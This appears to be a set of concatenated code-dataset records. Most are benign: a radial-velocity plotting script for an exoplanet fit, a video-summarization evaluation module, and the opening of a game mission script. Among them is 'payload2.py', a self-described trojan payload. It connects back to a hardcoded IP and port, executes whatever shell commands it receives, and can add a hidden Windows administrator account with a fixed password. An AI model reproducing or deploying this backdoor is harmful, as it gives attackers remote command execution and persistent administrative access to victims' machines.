'pink', 'green', 'grey', 'red']\n\nhighlight_format = dict(marker='o', ms=16, mfc='none', mew=2, mec='gold', zorder=99)\n\n\nif not emcee.__version__ == \"2.2.1\":\n raise AssertionError('radvel requires emcee v2')\n\nclass args_object(object):\n \"\"\"\n a minimal version of the \"parser\" object that lets you work with the\n high-level radvel API from python. 
(without directly using the command line\n    interface)\n    \"\"\"\n    def __init__(self, setupfn, outputdir):\n        # return args object with the following parameters set\n        self.setupfn = setupfn\n        self.outputdir = outputdir\n        self.decorr = False\n        self.plotkw = {}\n        self.gp = False\n\n\ndef limit_plots(args):\n    \"\"\"\n    Generate plots\n\n    Args:\n        args (ArgumentParser): command line arguments\n    \"\"\"\n\n    config_file = args.setupfn\n    conf_base = os.path.basename(config_file).split('.')[0]\n    statfile = os.path.join(\n        args.outputdir, \"{}_radvel.stat\".format(conf_base)\n    )\n\n    status = load_status(statfile)\n\n    assert status.getboolean('fit', 'run'), \\\n        \"Must perform max-likelihood fit before plotting\"\n\n    postpath = status.get('fit', 'postfile')\n    postpath = os.path.join(\n        args.outputdir, os.path.basename(postpath)\n    )\n    if not os.path.exists(postpath):\n        raise FileNotFoundError(f'expected posterior file to exist, {postpath}')\n\n    post = radvel.posterior.load(postpath)\n\n    # from timmy.driver.soneoff_drivers, 99.7th percentile\n    logk1_limit = 4.68726682\n    post.params['logk1'] = radvel.Parameter(value=logk1_limit)\n    post.params['k1'] = radvel.Parameter(value=np.exp(logk1_limit))\n\n    for ptype in args.type:\n        print(\"Creating {} plot for {}\".format(ptype, conf_base))\n\n        if ptype == 'rv':\n            args.plotkw['uparams'] = post.uparams\n            saveto = os.path.join(\n                args.outputdir,conf_base+'_rvlimit_multipanel.pdf'\n            )\n            P, _ = radvel.utils.initialize_posterior(config_file)\n            if hasattr(P, 'bjd0'):\n                args.plotkw['epoch'] = P.bjd0\n\n            # import IPython; IPython.embed()\n            # P.params (set logk1 to whatever...)\n            # assert 0\n\n            RVPlot = MultipanelPlot(\n                post, saveplot=saveto, **args.plotkw\n            )\n            RVPlot.plot_multipanel()\n\n        savestate = {'{}_plot'.format(ptype): os.path.relpath(saveto)}\n        save_status(statfile, 'plot', savestate)\n\n\nclass MultipanelPlot(object):\n    \"\"\"\n    Class to handle the creation of RV multipanel plots.\n\n    Args:\n        post (radvel.Posterior): radvel.Posterior object. The model\n            plotted will be generated from `post.params`\n        epoch (int, optional): epoch to subtract off of all time measurements\n        yscale_auto (bool, optional): Use matplotlib auto y-axis\n            scaling (default: False)\n        yscale_sigma (float, optional): Scale y-axis limits for all panels to be +/-\n            yscale_sigma*(RMS of data plotted) if yscale_auto==False\n        phase_nrows (int, optional): number of rows in the phase\n            folded plots. Default is nplanets.\n        phase_ncols (int, optional): number of columns in the phase\n            folded plots. Default is 1.\n        uparams (dict, optional): parameter uncertainties, must\n            contain 'per', 'k', and 'e' keys.\n        telfmts (dict, optional): dictionary of dictionaries mapping\n            instrument suffix to plotting format code. Example:\n                telfmts = {\n                     'hires': dict(fmt='o',label='HIRES'),\n                     'harps-n': dict(fmt='s')\n                     }\n        legend (bool, optional): include legend on plot? Default: True.\n        phase_limits (list, optional): two element list specifying\n            pyplot.xlim bounds for phase-folded plots. Useful for\n            partial orbits.\n        nobin (bool, optional): If True do not show binned data on\n            phase plots. Will default to True if total number of\n            measurements is less than 20.\n        phasetext_size (string, optional): fontsize for text in phase plots.\n            Choice of {'xx-small', 'x-small', 'small', 'medium', 'large',\n            'x-large', 'xx-large'}. 
Default: 'x-small'.\n rv_phase_space (float, optional): amount of space to leave between orbit/residual plot\n and phase plots.\n figwidth (float, optional): width of the figures to be produced.\n Default: 7.5 (spans a page with 0.5 in margins)\n fit_linewidth (float, optional): linewidth to use for orbit model lines in phase-folded\n plots and residuals plots.\n set_xlim (list of float): limits to use for x-axes of the timeseries and residuals plots, in\n JD - `epoch`. Ex: [7000., 70005.]\n text_size (int): set matplotlib.rcParams['font.size'] (default: 9)\n highlight_last (bool): make the most recent measurement much larger in all panels\n show_rms (bool): show RMS of the residuals by instrument in the legend\n legend_kwargs (dict): dict of options to pass to legend (plotted in top panel)\n \"\"\"\n def __init__(self, post, saveplot=None, epoch=2450000, yscale_auto=False,\n yscale_sigma=3.0, phase_nrows=None, phase_ncols=None,\n uparams=None, telfmts={}, legend=True, phase_limits=[],\n nobin=False, phasetext_size='medium', rv_phase_space=0.08,\n figwidth=4.2, fit_linewidth=1.0, set_xlim=None, text_size=11,\n highlight_last=False, show_rms=False,\n legend_kwargs=dict(loc='best')):\n\n self.post = post\n self.saveplot = saveplot\n self.epoch = epoch\n self.yscale_auto = yscale_auto\n self.yscale_sigma = yscale_sigma\n if phase_ncols is None:\n self.phase_ncols = 1\n if phase_nrows is None:\n self.phase_nrows = self.post.likelihood.model.num_planets\n self.uparams = uparams\n self.rv_phase_space = rv_phase_space\n self.telfmts = telfmts\n self.legend = legend\n self.phase_limits = phase_limits\n self.nobin = nobin\n self.phasetext_size = phasetext_size\n self.figwidth = figwidth\n self.fit_linewidth = fit_linewidth\n self.set_xlim = set_xlim\n self.highlight_last = highlight_last\n self.show_rms = show_rms\n self.legend_kwargs = legend_kwargs\n rcParams['font.size'] = text_size\n\n if isinstance(self.post.likelihood, radvel.likelihood.CompositeLikelihood):\n self.like_list = self.post.likelihood.like_list\n else:\n self.like_list = [self.post.likelihood]\n\n # FIGURE PROVISIONING\n # self.ax_rv_height = self.figwidth * 0.6\n # self.ax_phase_height = self.ax_rv_height / 1.4\n self.ax_rv_height = self.figwidth * 0.5\n self.ax_phase_height = self.ax_rv_height\n\n # convert params to synth basis\n synthparams = self.post.params.basis.to_synth(self.post.params)\n self.post.params.update(synthparams)\n\n self.model = self.post.likelihood.model\n self.rvtimes = self.post.likelihood.x\n self.rverr = self.post.likelihood.errorbars()\n self.num_planets = self.model.num_planets\n\n self.rawresid = self.post.likelihood.residuals()\n\n self.resid = (\n self.rawresid + self.post.params['dvdt'].value*(self.rvtimes-self.model.time_base)\n + self.post.params['curv'].value*(self.rvtimes-self.model.time_base)**2\n )\n\n if self.saveplot is not None:\n resolution = 10000\n else:\n resolution = 2000\n\n periods = []\n for i in range(self.num_planets):\n periods.append(synthparams['per%d' % (i+1)].value)\n if len(periods) > 0:\n longp = max(periods)\n else:\n longp = max(self.post.likelihood.x) - min(self.post.likelihood.x)\n\n self.dt = max(self.rvtimes) - min(self.rvtimes)\n self.rvmodt = np.linspace(\n min(self.rvtimes) - 0.05 * self.dt, max(self.rvtimes) + 0.05 * self.dt + longp,\n int(resolution)\n )\n\n self.orbit_model = self.model(self.rvmodt)\n self.rvmod = self.model(self.rvtimes)\n\n if ((self.rvtimes - self.epoch) < -2.4e6).any():\n self.plttimes = self.rvtimes\n self.mplttimes = self.rvmodt\n elif 
self.epoch == 0:\n self.epoch = 2450000\n self.plttimes = self.rvtimes - self.epoch\n self.mplttimes = self.rvmodt - self.epoch\n else:\n self.plttimes = self.rvtimes - self.epoch\n self.mplttimes = self.rvmodt - self.epoch\n\n self.slope = (\n self.post.params['dvdt'].value * (self.rvmodt-self.model.time_base)\n + self.post.params['curv'].value * (self.rvmodt-self.model.time_base)**2\n )\n self.slope_low = (\n self.post.params['dvdt'].value * (self.rvtimes-self.model.time_base)\n + self.post.params['curv'].value * (self.rvtimes-self.model.time_base)**2\n )\n\n # list for Axes objects\n self.ax_list = []\n\n def plot_timeseries(self, ylim=(-510, 510)):\n \"\"\"\n Make a plot of the RV data and model in the current Axes.\n \"\"\"\n\n ax = plt.gca()\n\n ax.axhline(0, color='k', linestyle=':', linewidth=1)\n\n if self.show_rms:\n rms_values = dict()\n for like in self.like_list:\n inst = like.suffix\n rms = np.std(like.residuals())\n rms_values[inst] = rms\n else:\n rms_values = False\n\n # plot orbit model\n # ax.plot(self.mplttimes, self.orbit_model, 'b-', rasterized=False, lw=self.fit_linewidth)\n\n # plot data\n vels = self.rawresid+self.rvmod\n mtelplot(\n # data = residuals + model\n self.plttimes, vels, self.rverr, self.post.likelihood.telvec, ax, telfmts=self.telfmts,\n rms_values=rms_values\n )\n\n if self.set_xlim is not None:\n ax.set_xlim(self.set_xlim)\n else:\n ax.set_xlim(min(self.plttimes)-0.01*self.dt, max(self.plttimes)+0.01*self.dt)\n plt.setp(ax.get_xticklabels(), visible=False)\n\n if self.highlight_last:\n ind = np.argmax(self.plttimes)\n plt.plot(self.plttimes[ind], vels[ind], **plot.highlight_format)\n\n # legend\n if self.legend:\n ax.legend(numpoints=1, **self.legend_kwargs)\n\n # years on upper axis\n axyrs = ax.twiny()\n xl = np.array(list(ax.get_xlim())) + self.epoch\n decimalyear = Time(xl, format='jd', scale='utc').decimalyear\n axyrs.get_xaxis().get_major_formatter().set_useOffset(False)\n axyrs.set_xlim(*decimalyear)\n axyrs.set_xlabel('Year')\n plt.locator_params(axis='x', nbins=5)\n\n # if not self.yscale_auto:\n # scale = np.std(self.rawresid+self.rvmod)\n # ax.set_ylim(-self.yscale_sigma * scale, self.yscale_sigma * scale)\n\n if isinstance(ylim, tuple):\n ax.set_ylim(ylim)\n\n ax.set_ylabel('RV [{ms:}]'.format(**plot.latex))\n ax.set_xlabel('Time [JD - {:d}]'.format(int(np.round(self.epoch))))\n # ticks = ax.yaxis.get_majorticklocs()\n # ax.yaxis.set_ticks(ticks[1:])\n\n ax.get_yaxis().set_tick_params(which='both', direction='in')\n ax.get_xaxis().set_tick_params(which='both', direction='in')\n ax.tick_params(right=True, which='both', direction='in')\n axyrs.get_xaxis().set_tick_params(which='both', direction='in')\n\n def plot_residuals(self):\n \"\"\"\n Make a plot of residuals and RV trend in the current Axes.\n \"\"\"\n\n ax = plt.gca()\n\n ax.plot(self.mplttimes, self.slope, 'k-', lw=self.fit_linewidth)\n\n mtelplot(self.plttimes, self.resid, self.rverr, self.post.likelihood.telvec, ax, telfmts=self.telfmts)\n if not self.yscale_auto:\n scale = np.std(self.resid)\n ax.set_ylim(-self.yscale_sigma * scale, self.yscale_sigma * scale)\n\n if self.highlight_last:\n ind = np.argmax(self.plttimes)\n plt.plot(self.plttimes[ind], self.resid[ind], **plot.highlight_format)\n\n if self.set_xlim is not None:\n ax.set_xlim(self.set_xlim)\n else:\n ax.set_xlim(min(self.plttimes)-0.01*self.dt, max(self.plttimes)+0.01*self.dt)\n\n ##########################################\n # what would explain the Pdot from transits?\n period = 1.338231466*units.day\n Pdot_tra = 
-2.736e-10\n Pdot_err = 2**(1/2.)*2.83e-11 # inflating appropriately\n Pdot_tra_perr = Pdot_tra + Pdot_err\n Pdot_tra_merr = Pdot_tra - Pdot_err\n dvdt_tra = (Pdot_tra * const.c / period).to(\n (units.m/units.s)/units.day).value\n dvdt_tra_perr = (Pdot_tra_perr * const.c / period).to(\n (units.m/units.s)/units.day).value\n dvdt_tra_merr = (Pdot_tra_merr * const.c / period).to(\n (units.m/units.s)/units.day).value\n\n # model times are now an arrow band\n _mtimes = np.linspace(np.min(self.plttimes)+3500,\n np.min(self.plttimes)+4000, num=2000)\n _mbase = np.nanmedian(_mtimes)\n model_tra_line = dvdt_tra*(_mtimes-_mbase)\n model_tra_merr = dvdt_tra_merr*(_mtimes-_mbase)# + curv*(_times-time_base)**2\n model_tra_perr = dvdt_tra_perr*(_mtimes-_mbase)# + curv*(_times-time_base)**2\n\n yoffset = 35\n ax.plot(_mtimes, model_tra_line+yoffset,\n color='purple', zorder=-3, lw=0.5, ls='-', linewidth=self.fit_linewidth)\n #ax.fill_between(_mtimes, model_tra_merr+yoffset, model_tra_perr+yoffset,\n # color='purple', zorder=-4, alpha=0.9, lw=0)\n ax.text(0.92, 0.85, 'Slope = $c\\dot{P}/P$', va='top', ha='right',\n transform=ax.transAxes, color='purple', alpha=0.9,\n fontsize='large')\n\n ##########################################\n\n ticks = ax.yaxis.get_majorticklocs()\n ax.yaxis.set_ticks([ticks[0], 0.0, ticks[-1]])\n plt.xlabel('Time [JD - {:d}]'.format(int(np.round(self.epoch))))\n ax.set_ylabel('Residuals [{ms:}]'.format(**plot.latex))\n ax.yaxis.set_major_locator(MaxNLocator(5, prune='both'))\n\n ax.get_yaxis().set_tick_params(which='both', direction='in')\n ax.get_xaxis().set_tick_params(which='both', direction='in')\n ax.tick_params(right=True, which='both', direction='in')\n ax.tick_params(top=True, which='both', direction='in')\n\n\n def plot_phasefold(self, pltletter, pnum):\n \"\"\"\n Plot phased orbit plots for each planet in the fit.\n\n Args:\n pltletter (int): integer representation of\n letter to be printed in the corner of the first\n phase plot.\n Ex: ord(\"a\") gives 97, so the input should be 97.\n pnum (int): the number of the planet to be plotted. Must be\n the same as the number used to define a planet's\n Parameter objects (e.g. 
'per1' is for planet #1)\n\n \"\"\"\n\n ax = plt.gca()\n\n if len(self.post.likelihood.x) < 20:\n self.nobin = True\n\n bin_fac = 1.75\n bin_markersize = bin_fac * rcParams['lines.markersize']\n bin_markeredgewidth = bin_fac * rcParams['lines.markeredgewidth']\n\n rvmod2 = self.model(self.rvmodt, planet_num=pnum) - self.slope\n modph = t_to_phase(self.post.params, self.rvmodt, pnum, cat=True) - 1\n rvdat = self.rawresid + self.model(self.rvtimes, planet_num=pnum) - self.slope_low\n phase = t_to_phase(self.post.params, self.rvtimes, pnum, cat=True) - 1\n rvdatcat = np.concatenate((rvdat, rvdat))\n rverrcat = np.concatenate((self.rverr, self.rverr))\n rvmod2cat = np.concatenate((rvmod2, rvmod2))\n bint, bindat, binerr = fastbin(phase+1, rvdatcat, nbins=25)\n bint -= 1.0\n\n ax.axhline(0, color='k', linestyle=':', linewidth=1)\n ax.plot(sorted(modph), rvmod2cat[np.argsort(modph)], 'k-', linewidth=self.fit_linewidth)\n #plot.labelfig(pltletter)\n\n telcat = np.concatenate((self.post.likelihood.telvec, self.post.likelihood.telvec))\n\n if self.highlight_last:\n ind = np.argmax(self.rvtimes)\n hphase = t_to_phase(self.post.params, self.rvtimes[ind], pnum, cat=False)\n if hphase > 0.5:\n hphase -= 1\n plt.plot(hphase, rvdatcat[ind], **plot.highlight_format)\n\n mtelplot(phase, rvdatcat, rverrcat, telcat, ax, telfmts=self.telfmts)\n if not self.nobin and len(rvdat) > 10:\n pass\n #ax.errorbar(\n # bint, bindat, yerr=binerr, fmt='ro', mec='w', ms=bin_markersize,\n # mew=bin_markeredgewidth\n #)\n\n if self.phase_limits:\n ax.set_xlim(self.phase_limits[0], self.phase_limits[1])\n else:\n ax.set_xlim(-0.5, 0.5)\n\n if not self.yscale_auto:\n scale = np.std(rvdatcat)\n ax.set_ylim(-self.yscale_sigma*scale, self.yscale_sigma*scale)\n ax.set_ylim((-510, 510))\n\n keys = [p+str(pnum) for p in ['per', 'k', 'e']]\n\n labels = [self.post.params.tex_labels().get(k, k) for k in keys]\n if pnum < self.num_planets:\n ticks = ax.yaxis.get_majorticklocs()\n ax.yaxis.set_ticks(ticks[1:-1])\n\n ax.set_ylabel('RV [{ms:}]'.format(**plot.latex))\n ax.set_xlabel('Phase')\n\n ax.get_yaxis().set_tick_params(which='both', direction='in')\n ax.get_xaxis().set_tick_params(which='both', direction='in')\n ax.tick_params(right=True, which='both', direction='in')\n ax.tick_params(top=True, which='both', direction='in')\n\n print_params = ['per', 'k', 'e']\n units = {'per': 'days', 'k': plot.latex['ms'], 'e': ''}\n\n anotext = []\n for l, p in enumerate(print_params):\n val = self.post.params[\"%s%d\" % (print_params[l], pnum)].value\n\n if self.uparams is None:\n _anotext = '$\\\\mathregular{%s}$ = %4.2f %s' % (labels[l].replace(\"$\", \"\"), val, units[p])\n else:\n if hasattr(self.post, 'medparams'):\n val = self.post.medparams[\"%s%d\" % (print_params[l], pnum)]\n else:\n print(\"WARNING: medparams attribute not found in \" +\n \"posterior object will annotate with \" +\n \"max-likelihood values and reported uncertainties \" +\n \"may not be appropriate.\")\n err = self.uparams[\"%s%d\" % (print_params[l], pnum)]\n if err > 1e-15:\n val, err, errlow = sigfig(val, err)\n _anotext = '$\\\\mathregular{%s}$ = %s $\\\\mathregular{\\\\pm}$ %s %s' \\\n % (labels[l].replace(\"$\", \"\"), val, err, units[p])\n else:\n _anotext = '$\\\\mathregular{%s}$ = %4.2f %s' % (labels[l].replace(\"$\", \"\"), val, units[p])\n\n anotext += [_anotext]\n\n #anotext = '\\n'.join(anotext)\n anotext = anotext[1] # just the semi-amplitude\n logk1_limit = 4.68726682\n #anotext = (\n # f'K < {np.exp(logk1_limit):.1f}' +' m$\\,$s$^{-1}$ (3$\\sigma$)\\n'\n 
# '$M_{\\mathrm{p}} \\sin i < 1.20\\,M_{\\mathrm{Jup}}$'\n #)\n anotext = (\n #f'K < {np.exp(logk1_limit):.1f}' +' m$\\,$s$^{-1}$ (3$\\sigma$)\\n'\n '$M_{\\mathrm{p}} \\sin i < 1.20\\,M_{\\mathrm{Jup}}\\ (3\\sigma)$'\n )\n\n add_anchored(\n anotext, loc='lower left', frameon=True, prop=dict(size=self.phasetext_size),\n bbox=dict(ec='none', fc='w', alpha=0.8)\n )\n\n\n def plot_multipanel(self, nophase=False, letter_labels=False):\n \"\"\"\n Provision and plot an RV multipanel plot\n\n Args:\n nophase (bool, optional): if True, don't\n include phase plots. Default: False.\n letter_labels (bool, optional): if True, include\n letter labels on orbit and residual plots.\n Default: True.\n\n Returns:\n tuple containing:\n - current matplotlib Figure object\n - list of Axes objects\n \"\"\"\n\n if nophase:\n scalefactor = 1\n else:\n scalefactor = self.phase_nrows\n\n figheight = self.ax_rv_height + self.ax_phase_height * scalefactor\n\n # provision figure\n fig = plt.figure(figsize=(self.figwidth, figheight+1.0))\n\n fig.subplots_adjust(left=0.12, right=0.95)\n gs_rv = gridspec.GridSpec(1, 1, height_ratios=[1.])\n\n divide = 1 - self.ax_rv_height / figheight\n gs_rv.update(left=0.12, right=0.93, top=0.93,\n bottom=divide+self.rv_phase_space*0.5, hspace=0.)\n\n # orbit plot\n ax_rv = plt.subplot(gs_rv[0, 0])\n self.ax_list += [ax_rv]\n\n plt.sca(ax_rv)\n self.plot_timeseries()\n pltletter = ord('a')\n if letter_labels:\n plot.labelfig(pltletter)\n pltletter += 1\n\n # # residuals\n # ax_resid = plt.subplot(gs_rv[1, 0])\n # self.ax_list += [ax_resid]\n\n # plt.sca(ax_resid)\n # self.plot_residuals()\n # if letter_labels:\n # plot.labelfig(pltletter)\n # pltletter += 1\n\n # phase-folded plots\n if not nophase:\n gs_phase = gridspec.GridSpec(self.phase_nrows, self.phase_ncols)\n\n if self.phase_ncols == 1:\n gs_phase.update(left=0.12, right=0.93,\n top=divide - self.rv_phase_space * 0.5,\n bottom=0.07, hspace=0.003)\n else:\n gs_phase.update(left=0.12, right=0.93,\n top=divide - self.rv_phase_space * 0.5,\n bottom=0.07, hspace=0.25, wspace=0.25)\n\n for i in range(self.num_planets):\n i_row = int(i / self.phase_ncols)\n i_col = int(i - i_row * self.phase_ncols)\n ax_phase = plt.subplot(gs_phase[i_row, i_col])\n self.ax_list += [ax_phase]\n\n plt.sca(ax_phase)\n self.plot_phasefold(pltletter, i+1)\n pltletter += 1\n\n if self.saveplot is not None:\n fig.tight_layout(w_pad=2, h_pad=2)\n plt.savefig(self.saveplot, dpi=150, bbox_inches='tight')\n print(\"RV multi-panel plot saved to %s\" % self.saveplot)\n\n return fig, self.ax_list\n\n\ndef telplot(x, y, e, tel, ax, lw=1., telfmt={}, rms=0):\n \"\"\"Plot data from from a single telescope\n\n x (array): Either time or phase\n y (array): RV\n e (array): RV error\n tel (string): telecsope string key\n ax (matplotlib.axes.Axes): current Axes object\n lw (float): line-width for error bars\n telfmt (dict): dictionary corresponding to kwargs\n passed to errorbar. 
Example:\n\n telfmt = dict(fmt='o',label='HIRES',color='red')\n \"\"\"\n\n # Default formatting\n kw = dict(\n fmt='o', capsize=0, mew=0,\n ecolor='0.6', lw=lw, color='orange',\n )\n\n # If not explicit format set, look among default formats\n if not telfmt and tel in telfmts_default:\n telfmt = telfmts_default[tel]\n\n for k in telfmt:\n kw[k] = telfmt[k]\n\n if not 'label' in kw.keys():\n if tel in telfmts_default:\n kw['label'] = telfmts_default[tel]['label']\n else:\n kw['label'] = tel\n\n if rms:\n kw['label'] += '\\nRMS={:.2f} {:s}'.format(rms, latex['ms'])\n\n plt.errorbar(x, y, yerr=e, **kw)\n\n\ndef mtelplot(x, y, e, tel, ax, lw=1., telfmts={}, **kwargs):\n \"\"\"\n Overplot data from from multiple telescopes.\n\n x (array): Either time or phase\n y (array): RV\n e (array): RV error\n tel (array): array of telecsope string keys\n ax (matplotlib.axes.Axes): current Axes object\n telfmts (dict): dictionary of dictionaries corresponding to kwargs\n passed to errorbar. Example:\n\n telfmts = {\n 'hires': dict(fmt='o',label='HIRES'),\n 'harps-n' dict(fmt='s')\n }\n \"\"\"\n\n rms_values = kwargs.pop('rms_values', False)\n\n utel = np.unique(tel)\n\n ci = 0\n for t in utel:\n xt = x[tel == t]\n yt = y[tel == t]\n et = e[tel == t]\n\n telfmt = {}\n\n if t in telfmts:\n telfmt = telfmts[t]\n if 'color' not in telfmt:\n telfmt['color'] = default_colors[ci]\n ci +=1\n elif t not in telfmts and t not in telfmts_default:\n telfmt = dict(color=default_colors[ci])\n ci +=1\n else:\n telfmt = {}\n\n if rms_values:\n rms = rms_values[t]\n else:\n rms = 0\n\n telplot(xt, yt, et, t, ax, lw=1., telfmt=telfmt, rms=rms)\n\n ax.yaxis.set_major_formatter(\n matplotlib.ticker.ScalarFormatter(useOffset=False)\n )\n ax.xaxis.set_major_formatter(\n matplotlib.ticker.ScalarFormatter(useOffset=False)\n )\n\n\ndef add_anchored(*args, **kwargs):\n \"\"\"\n Add text at a particular location in the current Axes\n\n Args:\n s (string): text\n loc (string): location code\n pad (float [optional]): pad between the text and the frame\n as fraction of the font size\n borderpad (float [optional]): pad between the frame and the axes (or *bbox_to_anchor*)\n prop (matplotlib.font_manager.FontProperties): font properties\n \"\"\"\n\n bbox = {}\n if 'bbox' in kwargs:\n bbox = kwargs.pop('bbox')\n at = AnchoredText(*args, **kwargs)\n if len(bbox.keys()) > 0:\n plt.setp(at.patch, **bbox)\n\n ax = plt.gca()\n ax.add_artist(at)\n\n\ndef plot_rvs():\n\n setupfn = \"/home/luke/Dropbox/proj/timmy/drivers/radvel_drivers/TOI837.py\"\n outputdir = \"/home/luke/Dropbox/proj/timmy/results/radvel_fitting/20200624_simple_planet\"\n\n if not os.path.exists(outputdir):\n os.mkdir(outputdir)\n\n args = args_object(setupfn, outputdir)\n\n # plot the upper limit (99.7th pctile) fit, which has already been\n # performed in 20200624_simple_planet\n args.type = ['rv']\n limit_plots(args) # pulled from radvel.driver.plots\n\n\nif __name__ == \"__main__\":\n plot_rvs()\n","sub_path":"drivers/plot_rvs.py","file_name":"plot_rvs.py","file_ext":"py","file_size_in_byte":28533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"268849648","text":"##\n# SIMPLE PAYLOAD FOR TROJAN PYTHON \n#@author - Jerome Themee - security analyst \n#@date - 16/07/2015\n##\nimport socket\nimport subprocess\n\n# target\ntarget_host = \"10.94.71.26\"\ntarget_port = 9004\nlocalIp = socket.gethostbyname(socket.gethostname())\n\n# create the socket object with python\nclient = socket.socket(socket.AF_INET, 
socket.SOCK_STREAM)\nclient.connect((target_host,target_port))\n\n#run command function\ndef run_command(cmd):\n    '''given shell command, returns communication tuple of stdout and stderr'''\n    return subprocess.Popen(cmd,\n                            stdout=subprocess.PIPE, \n                            stderr=subprocess.PIPE, \n                            stdin=subprocess.PIPE).communicate()\n\n\nwhile 1 :\n\n    response = client.recv(4096)\n\n    if response==\"1\":\n        outputCommand = run_command(\"ipconfig\")[0]\n        client.send(outputCommand)\n\n    elif response == \"2\":\n        outputCommand = run_command(\"net user kali Azerty123456 /add\")[0]\n        outputCommand = run_command(\"net localgroup administrateurs kali /add\")[0]\n        client.send(\"Account created kali Azerty123456 \")\n\n    elif response == \"3\":\n        outputCommand = run_command(\"powershell.exe -command Invoke-WebRequest https\")[0]\n        client.send(\"Account created kali Azerty123456 \")\n\n    elif response == \"4\":\n        outputCommand = run_command(\"net user kali Azerty123456 /add\")[0]\n        outputCommand = run_command(\"net localgroup administrateurs kali /add\")[0]\n        client.send(\"Account created kali Azerty123456 \")\n\n    else :\n        outputCommand = run_command(response)[0]\n        client.send(outputCommand)\n\n\n","sub_path":"trojan/payload2.py","file_name":"payload2.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"284461035","text":"import torch\n\nimport numpy as np\nfrom scipy import interpolate\n\nfrom knapsack_solver import knapsack\n\nfrom scipy.stats import kendalltau, spearmanr\nfrom scipy.stats import rankdata\n\nfrom sklearn.metrics import precision_recall_fscore_support\n\nimport sys\n\ndef eval_metrics(y_pred, y_true):\n    precision, recall, fscore, _ = precision_recall_fscore_support(y_true, y_pred, average='binary', zero_division=0)\n    return precision, recall, fscore\n\n\ndef select_keyshots(video_info, pred_score, inter_method = \"upsample\"):\n    \"\"\"\n    input:\n        video_info: specific video of *.h5 file\n        pred_score: [320] key frame score for every frame\n    \"\"\"\n\n    N = video_info['length'][()] # scalar, video original length\n    cps = video_info['change_points'][()] # shape [n_segments,2], stores begin and end of each segment in original length index\n\n    pred_score = pred_score.to(\"cpu\").detach().numpy() # GPU->CPU, requires_grad=False, to numpy\n    \n    if inter_method == \"upsample\":\n        pred_score = upsample(pred_score, N)\n    elif inter_method == \"cut\":\n        pred_score = cut(pred_score, N)\n\n    pred_score_key_frames = (pred_score > 0.5) # convert to key frames\n\n    value = np.array([pred_score_key_frames[cp[0]:(cp[1])].mean() for cp in cps]) # [n_segments]\n    # weight = video_info['n_frame_per_seg'][()] # shape [n_segments], number of frames in each segment\n    weight = np.ones((cps.shape[0]), dtype=int)\n\n    _, selected = knapsack(list(zip(value, weight)), 2) \n    # _, selected = knapsack(list(zip(value, weight)), int(0.15*N)) # selected -> [66, 64, 51, 50, 44, 41, 40, 38, 34, 33, 31, 25, 24, 23, 20, 10, 9]\n    selected = selected[::-1] # inverse the selected list, which seg is selected\n    key_shots = np.zeros(shape=(N, ))\n    for i in selected:\n        key_shots[cps[i][0]:(cps[i][1])] = 1 # assign 1 to seg\n    \n    return pred_score.tolist(), key_shots\n\ndef upsample(pred_score, N):\n    \"\"\"\n    Use Nearest Neighbor to extend from 320 to N\n    input: \n        pred_score: shape [320], indicates key frame prob.\n        N: scalar, video original length\n    output\n        up_arr: shape [N]\n    \"\"\"\n    x = np.linspace(0, len(pred_score)-1, len(pred_score))\n    f = interpolate.interp1d(x, 
pred_score, kind='nearest')\n x_new = np.linspace(0, len(pred_score)-1, N); #print(x_new, N)\n up_arr = f(x_new)\n\n return up_arr\n\ndef cut(arr, N):\n return arr[:N]\n\ndef rankcorrelation_kendall(y_pred, y_true):\n return kendalltau(rankdata(-y_true), rankdata(-y_pred))[0]\n\ndef rankcorrelation_spearman(y_pred, y_true):\n return spearmanr(y_true, y_pred)\n\n\nif __name__ == \"__main__\":\n device = torch.device(\"cuda:0\")\n\n import h5py\n data_file = h5py.File(\"datasets/fcsn_tvsum.h5\")\n video_info = data_file[\"video_1\"]\n pred_score = torch.randn((320,), requires_grad=True)\n pred_score = pred_score.to(device)\n select_keyshots(video_info, pred_score)\n","sub_path":"eval_tools.py","file_name":"eval_tools.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"142350114","text":"###############################################################################\n# Episode2.py\n#\n# Episode level script. Holds variables and functions global to Episode\n#\n# Created 11-13-00\tJess VanDerwalker\n###############################################################################\nimport App\nimport MissionLib\n\n# For debugging\n#kDebugObj = App.CPyDebug()\n\n\n# Declare global variables\nTRUE\t= 1\nFALSE\t= 0\n\ng_bKaroonDestroyed = None\n\n################################################################################\n##\tInitialize()\n##\t\n## Called once when episode loads to initialize episode\n##\t\n##\tArgs: \tpEpisode\t- The episode object\n##\t\n##\tReturn: None\n################################################################################\ndef Initialize(pEpisode):\n\tApp.g_kUtopiaModule.LoadEpisodeSounds(\"Episode 2\")\n\n\t\"Called Initialize and activate an Episode\"\t\n\t\n\t# Initialize our global variables\n\tglobal g_bKaroonDestroyed\n\tg_bKaroonDestroyed = FALSE\n\t\n\t# Set our Episode level TGL\n\tpEpisode.SetDatabase(\"data/TGL/Maelstrom/Episode 2/Episode2.tgl\")\n\t\n\t#\n\t# Setup music for this episode.\n\t#\n\tSetupMusic()\n\n\t#\n\t# Start in the default mission of this episode.\n\t#\n\tpMissionStartEvent = App.TGEvent_Create()\n\tpMissionStartEvent.SetEventType(App.ET_MISSION_START)\n\tpMissionStartEvent.SetDestination(pEpisode)\n\n\t# Start in the default mission of this episode.\n\t# Check if there is a mission override, and if so, then\n\t# use it.\n\tpcOverride = App.g_kVarManager.GetStringVariable(\"Options\", \"MissionOverride\")\n\n\tif (pcOverride != \"\"):\n\t\tpEpisode.LoadMission(\"Maelstrom.Episode2.\" + pcOverride + \".\" + pcOverride, pMissionStartEvent)\n\t\tApp.g_kVarManager.SetStringVariable(\"Options\", \"MissionOverride\", \"\")\n\telse:\n\t\tpEpisode.LoadMission(\"Maelstrom.Episode2.E2M0.E2M0\", pMissionStartEvent)\n\t\n################################################################################\n##\tE2M1KrellSOS()\n##\n##\tCreates the sets, play the SOS from the Krell.\n##\n##\tArgs:\tNone\n##\n##\tReturn:\tNone\n################################################################################\ndef E2M1KrellSOS():\n#\tkDebugObj.Print(\"E2M1 Krell SOS sequence.\")\n\t# Create the Cardassian bridge\n\tpCardSet = MissionLib.SetupBridgeSet(\"CardSet\", \"data/Models/Sets/Cardassian/cardbridge.nif\", -30, 65, 